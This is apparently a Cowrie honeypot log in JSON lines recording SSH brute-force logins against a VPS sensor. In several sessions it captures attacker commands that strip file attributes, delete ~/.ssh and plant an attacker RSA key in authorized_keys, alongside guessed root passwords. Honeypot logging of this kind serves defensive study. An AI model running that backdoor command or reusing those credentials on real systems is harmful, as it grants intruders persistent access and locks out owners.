{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:49.098079Z","src_ip":"139.19.117.131","session":"0f8d0d2d2e7c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:49.545944Z","src_ip":"212.227.235.229","session":"f30135e118be"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:50.784520Z","src_ip":"212.227.235.229","session":"f30135e118be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53068,"dst_ip":"1.2.3.4","dst_port":22,"session":"30a22cb3283b","protocol":"ssh","message":"New connection: 212.227.235.229:53068 (1.2.3.4:22) [session: 30a22cb3283b]","sensor":"my-vps","timestamp":"2025-09-08T22:57:51.010905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:51.035400Z","src_ip":"212.227.235.229","session":"30a22cb3283b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:51.282581Z","src_ip":"212.227.235.229","session":"30a22cb3283b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:57:52.270230Z","src_ip":"212.227.235.229","session":"30a22cb3283b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:52.517664Z","src_ip":"212.227.235.229","session":"30a22cb3283b"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:52.525582Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44370,"dst_ip":"1.2.3.4","dst_port":22,"session":"88093fb9c57e","protocol":"ssh","message":"New connection: 212.227.235.229:44370 (1.2.3.4:22) [session: 88093fb9c57e]","sensor":"my-vps","timestamp":"2025-09-08T22:58:01.484690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:01.486028Z","src_ip":"212.227.235.229","session":"88093fb9c57e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:01.811956Z","src_ip":"212.227.235.229","session":"88093fb9c57e"}
{"eventid":"cowrie.login.failed","username":"mithun","password":"mithun","message":"login attempt [mithun/mithun] failed","sensor":"my-vps","timestamp":"2025-09-08T22:58:03.157046Z","src_ip":"212.227.235.229","session":"88093fb9c57e"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:04.485278Z","src_ip":"212.227.235.229","session":"88093fb9c57e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56974,"dst_ip":"1.2.3.4","dst_port":22,"session":"694afd4648d5","protocol":"ssh","message":"New connection: 212.227.235.229:56974 (1.2.3.4:22) [session: 694afd4648d5]","sensor":"my-vps","timestamp":"2025-09-08T22:58:12.217594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:12.218185Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:12.316546Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.login.success","username":"root","password":"root123$%^","message":"login attempt [root/root123$%^] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:58:12.752177Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:58:12.965223Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:58:12.965989Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:58:12.966873Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.068009Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:58:13.380317Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.381063Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.481501Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.482428Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56988,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8aa31e7c77f","protocol":"ssh","message":"New connection: 212.227.235.229:56988 (1.2.3.4:22) [session: f8aa31e7c77f]","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.580577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.581470Z","src_ip":"212.227.235.229","session":"f8aa31e7c77f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35602,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ac6631a5f30","protocol":"ssh","message":"New connection: 212.227.235.229:35602 (1.2.3.4:22) [session: 3ac6631a5f30]","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.611223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.611851Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.680488Z","src_ip":"212.227.235.229","session":"f8aa31e7c77f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:13.847398Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:58:14.120207Z","src_ip":"212.227.235.229","session":"f8aa31e7c77f"}
{"eventid":"cowrie.login.success","username":"root","password":"123456Mm","message":"login attempt [root/123456Mm] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:58:14.831904Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.221153Z","src_ip":"212.227.235.229","session":"f8aa31e7c77f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:58:15.383977Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.384943Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.386376Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56992,"dst_ip":"1.2.3.4","dst_port":22,"session":"06389d4c3c30","protocol":"ssh","message":"New connection: 212.227.235.229:56992 (1.2.3.4:22) [session: 06389d4c3c30]","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.388564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.390022Z","src_ip":"212.227.235.229","session":"06389d4c3c30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.490170Z","src_ip":"212.227.235.229","session":"06389d4c3c30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52238,"dst_ip":"1.2.3.4","dst_port":22,"session":"279bd0fd8833","protocol":"ssh","message":"New connection: 212.227.235.229:52238 (1.2.3.4:22) [session: 279bd0fd8833]","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.523168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.526894Z","src_ip":"212.227.235.229","session":"279bd0fd8833"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.623458Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.663318Z","src_ip":"212.227.235.229","session":"279bd0fd8833"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.889367Z","src_ip":"212.227.235.229","session":"06389d4c3c30"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.990649Z","src_ip":"212.227.235.229","session":"06389d4c3c30"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:15.991612Z","src_ip":"212.227.235.229","session":"694afd4648d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:58:16.114874Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:58:16.115674Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:58:16.202467Z","src_ip":"212.227.235.229","session":"279bd0fd8833"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:58:16.353215Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:16.354330Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35606,"dst_ip":"1.2.3.4","dst_port":22,"session":"45eff2941018","protocol":"ssh","message":"New connection: 212.227.235.229:35606 (1.2.3.4:22) [session: 45eff2941018]","sensor":"my-vps","timestamp":"2025-09-08T22:58:16.585944Z"}
